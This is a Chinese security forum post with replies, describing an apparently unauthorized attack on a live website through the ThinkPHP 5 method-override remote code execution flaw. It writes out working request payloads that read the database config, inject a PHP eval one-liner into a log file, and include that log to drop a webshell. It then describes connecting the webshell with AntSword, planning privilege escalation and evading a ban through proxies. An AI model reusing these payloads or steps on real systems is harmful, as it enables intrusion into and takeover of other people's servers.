用户
搜索

[web安全] 实战TP5RCE

  • TA的每日心情
    慵懒
    2020-6-15 20:25
  • 签到天数: 16 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋-脚本小子

    Rank: 2

    4

    主题

    12

    帖子

    326

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2017-11-20
    发表于 2020-7-28 21:49:04 61100
    本帖最后由 i2stay 于 2020-7-28 21:57 编辑

    本文原创作者i2stay,本文属i春秋原创奖励计划,未经许可禁止转载!这个漏洞影响范围5.x < 5.1.31, <= 5.0.23
    主要是thinkphp\library\think\request.php中的method函数出现的问题
    在Method方法中,将表单伪装变量对该方法的变量进行覆盖,可以实现对该类的所有函数进行调用。
    1.png
    首先从url中的pub路径大致就可以判断出是thinkphp的框架
    我们让他报个错看看
    2.1.png
    路径和版本号都显示出来了
    网上可以搜索公开的漏洞利用方式,
    3.png
    _method=__construct&method=GET&filter[]=readfile&get[]=../application/database.php
    读取数据库配置文件
    4.png
    _method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['1']);?>
    往log文件中写入一句话
    5.1.png
    _method=__construct&method=get&filter[]=think\__include_file&get[]=../runtime/log/202007/28.log&1=file_put_contents('a.php','<?php eval($_POST[1]);?>');
    执行一句话生成php木马
    6.png
    蚁剑连接webshell
    数据库的阿里云的设置了白名单所以访问不了,考虑下一步提权
    该站点使用的宝塔对一些系统的命令做了禁止虚拟终端执行不了命令
    可以利用php7的php7-backtrace-bypass  https://github.com/mm0r1/exploits 来进行绕过
    这个我之前利用的时候是可以的,但是这次我被发现了 把webshell给我删了,ip也给我ban了,开了代理还是 被删了。
    我在阿里云搭了一个1:1的环境模拟一下想试一下脏牛提权,结果也被阿里云ban了,大佬们有什么思路可以分享一下啊,





    5.png
    2.png
    表哥666
    使用道具 举报 回复
    发表于 2020-7-29 10:58:52
    希望这种实操可以多发点
    使用道具 举报 回复
    这个tp5 exp复现的挺多的
    使用道具 举报 回复
    发表于 2020-7-29 20:07:37
    C_海克 发表于 2020-7-29 11:48
    这个tp5 exp复现的挺多的

    看了那么多我还是觉得我的方法最好用
    使用道具 举报 回复
    发表于 2020-7-30 20:19:15

    希望这种实操可以多发点
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    感谢楼主分享,学习了。
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册